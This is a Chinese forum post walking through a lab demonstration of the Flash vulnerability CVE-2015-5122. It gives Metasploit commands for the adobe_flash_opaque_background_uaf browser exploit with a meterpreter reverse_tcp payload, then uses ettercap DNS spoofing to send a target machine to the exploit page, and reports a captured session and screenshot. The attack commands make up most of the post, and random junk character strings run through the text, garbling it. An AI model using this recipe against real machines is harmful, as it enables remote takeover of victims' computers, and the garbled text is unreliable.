找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1328|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

; s2 E( N6 a* ^ 二、cve2015-5122漏洞实例演示虚拟机 ! D9 B! b& J' E) z' ~

; ^) z. |' \8 y' W; R$ i& I

/ G4 R [6 Y1 s, A1 r' ^   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: % O. o, u: I( R: a3 v

, o2 K" c9 Q6 I2 |& l; ~4 y! H

_% ]9 J5 c h6 h" G2 w) S+ b search cve-2015-5122如图: - k& R) u$ N: l, x. R5 o

4 i- o% D' {3 M2 C' S3 j

, a C M2 P b2 Q ]1 O! x9 O   4 n4 ?9 u' N: N9 i" F

, I/ L! q: u- X

) D( G3 f3 c* L8 N, j& X. T 下面我们敲如下命令: ' u" G% X- y+ w; X' Q5 l& ]" n

5 S: ^+ g5 [3 I8 O% r' ]7 G

& b* `( B/ J8 v. M+ N use exploit/multi/browser/adobe_flash_opaque_background_uaf * @, Z! w& m; b

- ?7 M! {8 I7 I# r0 J7 O

! |1 D5 R: A+ R set PAYLOAD windows/meterpreter/reverse_tcp $ q: _. V; \, X

' W D: h1 v+ J

- @% \/ Z3 H- { X set LHOST 192.168.0.109 ; l3 L* z" M8 b- l/ t6 c

l8 T# ]; u6 G4 E0 i

4 M8 ~/ F/ D0 C1 J set URIPATH /                        /*根目录*/ 4 q' B+ i5 B# [% }

& M* ~( P- ?3 i8 q2 h! r& y9 J; k

( q; Q7 F4 f4 y set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 & ]* K, o8 d; ]& b

, N8 i* `, z: N; {4 o9 ?

: m4 D$ m) B+ n; Y+ ]$ X. F7 U set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 5 Q3 q% w k2 x9 ?% Y; I

/ Y) I# s# A* y9 q

) _& z$ g% o) w; {/ L0 X" @ 然后show options如图: ! C- G/ x5 x+ L1 n

9 }0 d) {2 n# I; B! I" b6 h6 s, K

/ p, i- N$ `8 J/ T- e   6 {9 E" ]2 N+ [7 w# _2 K" Y# Z1 n

; f" a$ ]# w& [) q+ g

% J' I7 ?1 y7 j+ g+ X 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
* \- H" d( E& _) O4 ?
& A6 Z& F% L6 L) p- S

- C" K& J' I! V8 Y* q, y) t) m' ?

6 J3 c% F2 z* P, f3 M+ l! N 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 & ]4 A5 D2 Z* {( n9 O0 x3 e

5 W4 Z' t1 X: p9 V: q: d4 A' O

% z7 t7 i2 T" o* g Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf - _. D0 `& d6 t7 u& p3 ]( m6 o* h8 I

+ R1 }0 B6 w P8 A& _

+ k5 A8 w F& P, k# l6 t   ) b; o* d1 f/ `+ ?8 \8 J( @9 B

( i9 w, M7 _! A" f

" I8 X' }) U& P# i 成功了,这时候我们断开ettercap,如图: & [, }5 H2 ?0 P* G# `

+ G6 O) G: u, c1 H

. u, z o0 l3 x8 L* s4 h   , c; ]! q& G' o1 `% d1 O- r, e

0 c, z1 H, w; P7 x$ F G

9 m# n% f- i' U6 V Screenshot如图: ' U) c1 J& x4 q7 i

; _9 A ?; f2 J" j1 E

+ u; e( X1 k# d8 \! o$ J) a4 x) q2 A   & I; @" p7 ]5 R! F0 ^& E

1 E I2 R/ i3 A- P+ [

- S+ M/ E& e! T& I! R3 G: u) z ; T, s9 Y; ^' n* P9 ?

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表